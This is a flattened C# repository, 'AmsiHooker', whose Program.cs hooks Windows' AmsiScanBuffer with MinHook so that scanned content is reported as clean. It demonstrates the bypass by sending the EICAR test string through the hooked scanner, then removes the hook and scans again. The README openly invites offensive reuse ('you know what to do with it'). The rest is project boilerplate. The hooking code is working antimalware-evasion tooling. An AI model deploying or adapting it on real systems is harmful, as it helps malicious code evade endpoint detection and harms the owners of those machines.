├── packages
└── MinHook.NET.1.1.1
│ ├── MinHook.NET.1.1.1.nupkg
│ └── lib
│ ├── net40
│ └── MinHook.NET.dll
│ └── net45
│ └── MinHook.NET.dll
├── packages.config
├── App.config
├── SharpHookTest.sln
├── Properties
└── AssemblyInfo.cs
├── SharpHookTest.csproj
├── README.md
├── Program.cs
└── .gitignore
/packages/MinHook.NET.1.1.1/MinHook.NET.1.1.1.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/MinHook.NET.1.1.1.nupkg
--------------------------------------------------------------------------------
/packages/MinHook.NET.1.1.1/lib/net40/MinHook.NET.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/lib/net40/MinHook.NET.dll
--------------------------------------------------------------------------------
/packages/MinHook.NET.1.1.1/lib/net45/MinHook.NET.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/lib/net45/MinHook.NET.dll
--------------------------------------------------------------------------------
/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SharpHookTest.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31402.337
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHookTest", "SharpHookTest.csproj", "{9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C552BBA7-27E8-4E2A-80E0-D63F25E65748}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpHookTest")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpHookTest")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9d2affd7-37a5-4b5a-aec1-e5928d006fe4")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpHookTest.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}
8 | Exe
9 | SharpHookTest
10 | SharpHookTest
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 | packages\MinHook.NET.1.1.1\lib\net45\MinHook.NET.dll
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AmsiHooker
2 | Hookers are cooler than patches.
3 |
4 |
5 | simple eicar test sample but you know what to do with it lmao.
6 | first hooks amsi, pushes eicar through, then disables hook and does it again.
7 |
8 | ```
9 | MWWWWMWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWMWWWWMWWWMMWWWWWWWWWNK0000KNWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWM
10 | WWWWWWWMWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWXkl;'......'cxXWWWWWWWWMWWWWWWWWMWWWMWWWWWWW
11 | MWWWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWKo. .':loddoc,. 'xNWWWWMWWWMWWWWMWWWMWWWWWWWWM
12 | WWWWWWWWWWWMWWWWMWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWWWO, .cOXWMWWWWWNk, cXMWWWWWWWWWWWWWMWWWMWWWWWWW
13 | MWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWWWWWMW0' .dNWWWWWWWWWWWK; .oNWWWWWWWWWWWWWWWMWWWWWWWWM
14 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNl lNWWWWWWWWWWWWWk. ,KWWWWWWWWWWWWWWWWWWWWWWWWW
15 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWM0, .OWWWWWWWWWWWWWWO. ,0WWWWWWWWWWWWWWWWWWWWWWWWW
16 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWk. ;KWWWWWWWWWWWWWNo lNWWWWWWWWWWWWWWWWWWWWWWWWW
17 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNd. cXWWWWWWWWWWWWWX: ,0WWWWWWWWWWWWWWWWWWWWWWWWWW
18 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNXl lNWWWWWWWWWWWWWWO,:XWWWMWWWWWWWWWWWWWWWWWWWWWW
19 | WWWWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWMWWWWWWXO: .dWWWWWWMWWWWWWWWW0xXMWWWWMWWWMWWWWWWWWMWWWWWWW
20 | MWWWWWWWWMWWWMMWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWOl' .OWWWWMWWWMWWWWMWWWWWWWWWWWWMWWWWMWWWMWWWMWWWWW
21 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWMWWWWWWWWWWWWMXc. cXWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
22 | MWWWWWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWW0: ;0WWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWW
23 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXd. .,oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
24 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKkoc;cONo. ;ONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
25 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKxl,. ;OOxkXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
26 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXx:. .,;:xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
27 | WWWWWWWWWWWWWWWWWWMWWWWWWWWWNx' ;KMWWWWWWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWW
28 | WWWWWWWWWWWMWWWWWWWWMWWWWNko0O; ;KWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
29 | MWWWWMWWWWWWWWWWWWMWWWMWWK; .d0d. lNMWWWWWWWWMWWWWWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWWWWWM
30 | WWWWWWWMWWWWWWWWMWWWMWWWWWx. :OOl. .xWWWWWWWWWWWWWWWWWWWWWMWWWMWWWWMWWWWWWWWMWWWWWWWWWWW
31 | MWWWWWWWWMWWWWWWWWMWWWMWWWWO; .cOOl' :XMWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWM
32 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWXx, .:xOxc. 'OWWWWWWWWWWWWWMWWWWMWWWWWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
33 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXk:. 'cxOko:'.'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
34 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0o;. .;ldkOKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
35 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0dc,...'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
36 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNX0O0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
37 | WWMMWWMMWWWMMWWMMWWWMWWWMMWW----AMSI HOOKER by jfmaes---WWMMWWWMWWWMMWWWMWWWMMWWWMWWWMMWWMMWWWMWWWMM
38 |
39 | Failed to detect EICAR test, result 0
40 | Detected EICAR test
41 |
42 | ```
43 |
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 | using MinHook;
5 |
6 | namespace SharpHookTest
7 | {
8 | class Program
9 | {
10 | HookEngine engine = new HookEngine();
11 |
12 | /*pinvoke BS */
13 | public enum AMSI_RESULT
14 | {
15 | AMSI_RESULT_CLEAN = 0,
16 | AMSI_RESULT_NOT_DETECTED = 1,
17 | AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384,
18 | AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479,
19 | AMSI_RESULT_DETECTED = 32768
20 | }
21 | [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
22 | static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
23 | [DllImport("Amsi.dll")]
24 | public static extern uint AmsiScanBuffer(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result);
25 | [DllImport("Amsi.dll")]
26 | public static extern uint AmsiInitialize(string appName, out IntPtr amsiContext);
27 | [DllImport("Amsi.dll")]
28 | public static extern void AmsiUninitialize(IntPtr amsiContext);
29 |
30 | /* delegate bs */
31 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
32 | delegate uint AmsiScanBufferDelegate(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result);
33 |
34 | /*og function */
35 | AmsiScanBufferDelegate AmsiBuffer_orig;
36 |
37 | /*yolo everything is clean */
38 | uint Amsi_Detour(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result)
39 | {
40 | result = AMSI_RESULT.AMSI_RESULT_CLEAN;
41 | return AmsiBuffer_orig(amsiContext, buffer, length, contentName, session, out result);
42 | }
43 | void AmsiNoMo()
44 | {
45 |
46 | IntPtr lib = LoadLibrary("Amsi.dll");
47 | AmsiBuffer_orig = engine.CreateHook("Amsi.dll", "AmsiScanBuffer", new AmsiScanBufferDelegate(Amsi_Detour));
48 | engine.EnableHooks();
49 |
50 | }
51 |
52 | void DisableHooks()
53 | {
54 | engine.DisableHooks();
55 | }
56 | void EicarTest()
57 | {
58 | var virus = Encoding.UTF8.GetBytes(
59 | "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
60 | );
61 |
62 | IntPtr context;
63 | var hrInit = AmsiInitialize("AmsiTest", out context);
64 | if (hrInit != 0)
65 | {
66 | Console.WriteLine($"AmsiInitialize failed, HRESULT {hrInit:X8}");
67 | return;
68 | }
69 |
70 | AMSI_RESULT result;
71 | var hrScan = AmsiScanBuffer(
72 | context, virus, (uint)virus.Length,
73 | "EICAR Test File", IntPtr.Zero, out result
74 | );
75 |
76 | AmsiUninitialize(context);
77 |
78 | if (hrScan != 0)
79 | {
80 | Console.WriteLine($"AmsiScanBuffer failed, HRESULT {hrScan:X8}");
81 | }
82 | else if (result == AMSI_RESULT.AMSI_RESULT_DETECTED)
83 | {
84 | Console.WriteLine("Detected EICAR test");
85 | }
86 | else
87 | {
88 | Console.WriteLine($"Failed to detect EICAR test, result {0}", result);
89 | }
90 | }
91 |
92 | static void printBanner()
93 | {
94 | Console.WriteLine(@"
95 | MWWWWMWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWMWWWWMWWWMMWWWWWWWWWNK0000KNWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWM
96 | WWWWWWWMWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWXkl;'......'cxXWWWWWWWWMWWWWWWWWMWWWMWWWWWWW
97 | MWWWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWKo. .':loddoc,. 'xNWWWWMWWWMWWWWMWWWMWWWWWWWWM
98 | WWWWWWWWWWWMWWWWMWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWWWO, .cOXWMWWWWWNk, cXMWWWWWWWWWWWWWMWWWMWWWWWWW
99 | MWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWWWWWMW0' .dNWWWWWWWWWWWK; .oNWWWWWWWWWWWWWWWMWWWWWWWWM
100 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNl lNWWWWWWWWWWWWWk. ,KWWWWWWWWWWWWWWWWWWWWWWWWW
101 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWM0, .OWWWWWWWWWWWWWWO. ,0WWWWWWWWWWWWWWWWWWWWWWWWW
102 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWk. ;KWWWWWWWWWWWWWNo lNWWWWWWWWWWWWWWWWWWWWWWWWW
103 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNd. cXWWWWWWWWWWWWWX: ,0WWWWWWWWWWWWWWWWWWWWWWWWWW
104 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNXl lNWWWWWWWWWWWWWWO,:XWWWMWWWWWWWWWWWWWWWWWWWWWW
105 | WWWWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWMWWWWWWXO: .dWWWWWWMWWWWWWWWW0xXMWWWWMWWWMWWWWWWWWMWWWWWWW
106 | MWWWWWWWWMWWWMMWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWOl' .OWWWWMWWWMWWWWMWWWWWWWWWWWWMWWWWMWWWMWWWMWWWWW
107 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWMWWWWWWWWWWWWMXc. cXWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
108 | MWWWWWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWW0: ;0WWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWW
109 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXd. .,oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
110 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKkoc;cONo. ;ONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
111 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKxl,. ;OOxkXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
112 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXx:. .,;:xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
113 | WWWWWWWWWWWWWWWWWWMWWWWWWWWWNx' ;KMWWWWWWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWW
114 | WWWWWWWWWWWMWWWWWWWWMWWWWNko0O; ;KWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
115 | MWWWWMWWWWWWWWWWWWMWWWMWWK; .d0d. lNMWWWWWWWWMWWWWWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWWWWWM
116 | WWWWWWWMWWWWWWWWMWWWMWWWWWx. :OOl. .xWWWWWWWWWWWWWWWWWWWWWMWWWMWWWWMWWWWWWWWMWWWWWWWWWWW
117 | MWWWWWWWWMWWWWWWWWMWWWMWWWWO; .cOOl' :XMWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWM
118 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWXx, .:xOxc. 'OWWWWWWWWWWWWWMWWWWMWWWWWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
119 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXk:. 'cxOko:'.'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
120 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0o;. .;ldkOKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
121 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0dc,...'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
122 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNX0O0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
123 | WWMMWWMMWWWMMWWMMWWWMWWWMMWW----AMSI HOOKER by jfmaes---WWMMWWWMWWWMMWWWMWWWMMWWWMWWWMMWWMMWWWMWWWMM
124 | ");
125 | }
126 | static void Main(string[] args)
127 | {
128 | printBanner();
129 | Program p = new Program();
130 | p.AmsiNoMo();
131 | p.EicarTest();
132 | p.DisableHooks();
133 | p.EicarTest();
134 | Console.ReadKey();
135 | }
136 | }
137 | }
138 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------